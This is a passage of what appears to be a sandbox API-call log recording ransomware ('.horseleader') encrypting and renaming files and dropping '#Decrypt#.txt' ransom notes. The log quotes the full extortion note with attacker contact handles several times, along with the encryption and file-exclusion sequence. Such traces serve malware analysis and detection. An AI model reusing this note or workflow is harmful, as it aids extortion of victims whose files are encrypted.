hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=8723) returned 1 [0223.904] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x2213, lpOverlapped=0x0) returned 1 [0223.909] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.909] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x2213, lpOverlapped=0x0) returned 1 [0223.912] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.912] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.912] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.913] CloseHandle (hObject=0x21c) returned 1 [0223.913] GetProcessHeap () returned 0x780000 [0223.913] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.913] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.horseleader") returned 91 [0223.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.horseleader")) returned 1 [0223.914] GetProcessHeap () returned 0x780000 [0223.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.914] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0 [0223.914] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0223.914] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0223.914] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0223.915] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0223.915] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0223.916] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0223.916] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0223.916] CloseHandle (hObject=0x1cc) returned 1 [0223.917] GetProcessHeap () returned 0x780000 [0223.917] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0223.917] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0223.917] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0223.917] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\#Decrypt#.txt") returned 39 [0223.917] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0223.918] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0223.918] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0223.920] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0223.920] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0223.920] CloseHandle (hObject=0x164) returned 1 [0223.920] GetProcessHeap () returned 0x780000 [0223.920] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0223.920] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0223.920] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0223.920] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\#Decrypt#.txt") returned 29 [0223.921] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\#Decrypt#.txt" (normalized: "c:\\msocache\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0223.921] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0223.921] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0223.923] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0223.923] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0223.923] CloseHandle (hObject=0x200) returned 1 [0223.923] GetProcessHeap () returned 0x780000 [0223.923] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0223.923] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0223.923] lstrcmpiW (lpString1="pagefile.sys", lpString2="Windows") returned -1 [0223.923] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0223.924] StrStrIW (lpFirst="pagefile.sys", lpSrch=".horseleader") returned 0x0 [0223.924] lstrcmpW (lpString1="pagefile.sys", lpString2="#Decrypt#.txt") returned 1 [0223.924] lstrcmpW (lpString1="pagefile.sys", lpString2="_uninstalling_.png") returned 1 [0223.924] lstrlenW (lpString=".testttjffg") returned 11 [0223.924] StrStrW (lpFirst="\\\\?\\C:\\pagefile.sys", lpSrch=".testttjffg") returned 0x0 [0223.924] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: pbBuffer=0x32af6f0) returned 1 [0223.924] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0223.924] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0223.924] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0223.924] lstrcmpiW (lpString1="PerfLogs", lpString2="Windows") returned -1 [0223.924] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0223.924] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0223.925] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0223.925] lstrcmpW (lpString1="\\\\?\\C:\\PerfLogs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0223.925] GetProcessHeap () returned 0x780000 [0223.925] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0223.925] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0223.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0223.925] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0223.925] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0223.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0223.925] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0223.926] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0223.926] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0223.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0223.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0223.926] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Admin", cAlternateFileName="")) returned 1 [0223.926] lstrcmpiW (lpString1="Admin", lpString2="Windows") returned -1 [0223.926] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0223.926] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0223.926] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0223.926] lstrcmpW (lpString1="\\\\?\\C:\\PerfLogs\\Admin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0223.926] GetProcessHeap () returned 0x780000 [0223.926] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0223.926] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0223.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0223.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0223.927] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0223.927] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0223.927] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0223.927] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0223.927] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0223.927] lstrcmpW 